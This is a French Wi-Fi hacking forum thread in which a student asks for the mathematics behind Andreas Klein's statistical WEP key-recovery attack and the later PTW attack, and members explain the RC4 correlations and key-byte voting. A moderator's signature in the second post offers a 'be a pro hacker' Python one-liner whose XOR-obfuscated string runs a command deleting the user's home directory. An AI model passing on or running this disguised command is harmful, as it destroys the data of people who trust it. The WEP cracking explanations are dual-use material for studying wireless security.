Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 19-03-2012 16:26:48

titif
N00b
Inscription : 19-03-2012
Messages : 2

Explications profondes de l'attaque statistique d'Andreas Klein

Bonjour la communauté !

Voila je viens à vous car après de longues heurese de recherches partout sur le web, je ne parviens pas à trouver d'explications convenables sur le cassage de clef WEP.
En effet je cherche de vraies explications car pour mon projet de fin d'année je dois réaliser un programme mettant en oeuvre une attaque de clef wep et j'ai choisi l'attaque d'Andreas Klein car j'ai déja un document sur le sujet.
Seulement j'ai besoin de comprendre la théorie mathématique qui se cache derriere. Pas nécéssairement les démonstrations etc mais avoir une idée du pourquoi !

Je ne sais pas trop si les gens ici s'interessent au pourquoi mais j'ai vu des messages ou les gens avaient l'air de savoir ce qu'ils faisaient alors voici ma premiere question !

Pour commencer, je dispose actuellement des 16 octets du keystream et des IVs correspondants que j'ai obtenu apres exploitation des paquets capturés. Que dois-je faire de ces données ? et pourquoi ?

Merci d'avance pour vos réponses !

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 19-03-2012 18:30:01

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Explications profondes de l'attaque statistique d'Andreas Klein

Je te conseille de te tourner vers l'excellent pdf de Tews :

Breaking 104 bit WEP in less than 60 seconds
Erik Tews, Ralf-Philipp Weinmann, and Andrei Pyshkin
<e tews,weinmann,[email protected]>

(j'ai pas de lien, désolé )


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 19-03-2012 18:56:21

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Explications profondes de l'attaque statistique d'Andreas Klein

Bonjour Titif et bienvenue sur notre forum.
Est ce que tu peux mettre un lien vers le document en question?

programme mettant en oeuvre une attaque de clef wep

Aircrak-ng est open source... je ne comprends pas très bien ce que tu dois faire...

Seulement j'ai besoin de comprendre la théorie mathématique qui se cache derriere. Pas nécéssairement les démonstrations etc mais avoir une idée du pourquoi !

L'ancien élève de L que je suis est bien incapable de te faire une démonstration ou de t'expliquer la théorie derrière...
Tout ça se sont des histoires de probabilités tongue
L'attaque PTW est une "amélioration" de l'attaque Koreck. Je mets entre guillemet parce qu'elle peut nous donner le résultats avec beaucoup moins d'informations mais a une plus faible probabilité de succès.
Klein a observé une corrélation en RC4 entre les keybites du 1 au i-1, la keystream et le keybite i.
Si les keybites 1 au i-1 sont connus, il est possible de deviner le keybite suivant avec une probabilité de 1,36/256.
Ce qui rend possible le calcul de la somme des keybites du keybite i jusqu'à i + k avec une probabilité supèrieure à 1,24/256.
Erik Tews, Andrei Pychkine et Ralf-Philipp Weinmann se sont basés sur l'étude de klein pour mettre au point l'attaque PTW qui par l'utilisation des paquets ARP permet avec 85 000 paquets une possibilité de 95% de crack de la clef.
Interview with Erik Tews, Andrei Pychkine and Ralf-Philipp Weinmann
Le protocole WEP : mécanismes et failles
aircrak-ng.fr

Hors Ligne

#4 19-03-2012 21:26:24

titif
N00b
Inscription : 19-03-2012
Messages : 2

Re : Explications profondes de l'attaque statistique d'Andreas Klein

Tout d'abord merci pour vos réponses rapides !

alors @Spawn : Merci pour la source je file y jeter un coup d'oeil je te tiens au courant ! ( J'ai juste regardé rapidement mais il me semble très complet en effet ! )
-----> Breaking 104 bit WEP in less than 60 seconds


@kcdtv :
Pour commencer, j'ai jeté un coup d'oeil à tes liens, je connaissais déja le 2ème qui m'a pas mal aidé car il explique bien mieux le fonctionnement du WEP que le fichier que je possède.. Mais en ce qui concerne les failles il est un peu.. succinct !
En parlant de mon fichier, voici le lien : http://pparent.fr/media/DossierM8_WEP.pdf
Il a l'avantage d'être en français mais il est hélas truffé d'erreurs (sur le notations surtout qui doivent venir d'ailleurs et qui ne correspondent souvent pas entre elles ou qui ne sont pas introduites alors pour les deviner...). Et en plus j'ai l'impression qu'il est basé sur le fichier de Spawn !

Pour ce qui est de créer un programme disons que je dois apporter une part personnelle au projet, je vais donc développer un programme qui se contente d'analyser les données(récuperées auparavant par airodump-ng, exportées sous forme de fichier texte par whireshark et mises en forme pour ne conersver que les utiles par un programme que j'ai réalisé) et ensuite d'en extraire la clé exacte ! (même si aircrack le fait très bien ^^ )
Pour l'instant il ne me reste plus qu'à aller chercher les données déja mises en forme et les relier aux fonctions associées aux formules de calcul des clef que j'ai trouvées dans le fichier dont je t'ai donné le lien.

Depuis mon premier message je suis tombé sur le rapport en anglais d'Andreas Klein dans lequel il explique toute sa théorie et démontre beaucoup de proprietés et qui m'a beaucoup aidé mais il me reste encore quelques zones obscures..

D'après ce que j'ai compris, il faudrait pour chaque couple IV|Keystream et pour chaque octet allant de 1 à 13 calculer une variable statistique notée sigma_i associée à une certaine permutation (trouvée à partir de l'algorithme de génération de clef RC4) à partir de la, on compte tous les sigma_i égaux et on obtient un vote pour chaque sigma_i et on peut donc savoir quel est le sigma_i le plus probable ex:

pour sigma_4
00-->10 votes
01-->15 votes
...
...
46-->320votes (par exemple le max)
...
...
FF-->20 votes

Et on en déduit donc si la mesure est anormalement votée que c'est le bon sigma, ex ici le sigma n°4 serait 46 (en supposant que les autres soient significativement en dessous).

D'après ce que j'ai compris aussi on a une petite formule qui relie le sigma_i aux octets n°i-1 et i de la clef..


On va dire que tout ça c'est assimilé ! Maintenant il me reste 2 choses : l'avant et l'après.
Je m'explique :

AVANT : Comment détermine-t'on la formule qui donne les sigma_i ?
APRES : Il est question de bytes forts il me semble.. j'ai compris "qui ils sont", mais pas comment les traiter !..

Si vous avez des réponses claires même si elles ne sont que qualitatives elles sont les bienvenues !
En attendant je vais éplucher tout ces documents !
Merci encore ! big_smile

Hors Ligne

#5 20-03-2012 17:51:21

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Explications profondes de l'attaque statistique d'Andreas Klein

Le topic n'aborde pas directement l'aspect mathématique, mais il y a de nombreux liens vers des documents bien intéressants et de fil en aiguille, qui sait.. dans tous les cas sa lecture est recommandable et édifiante wink
Explications plus poussées sur le décryptage de clé WEP
Tu as bien regardé les points 3 et 4 du document Breaking 104 bit WEP in less than 60 seconds? J'ai l'impression que ce que tu recherches est là... Je dis bien "j'ai l'impression" parce que ces jolies formules ça me dépasse complètement... tongue

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.023 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]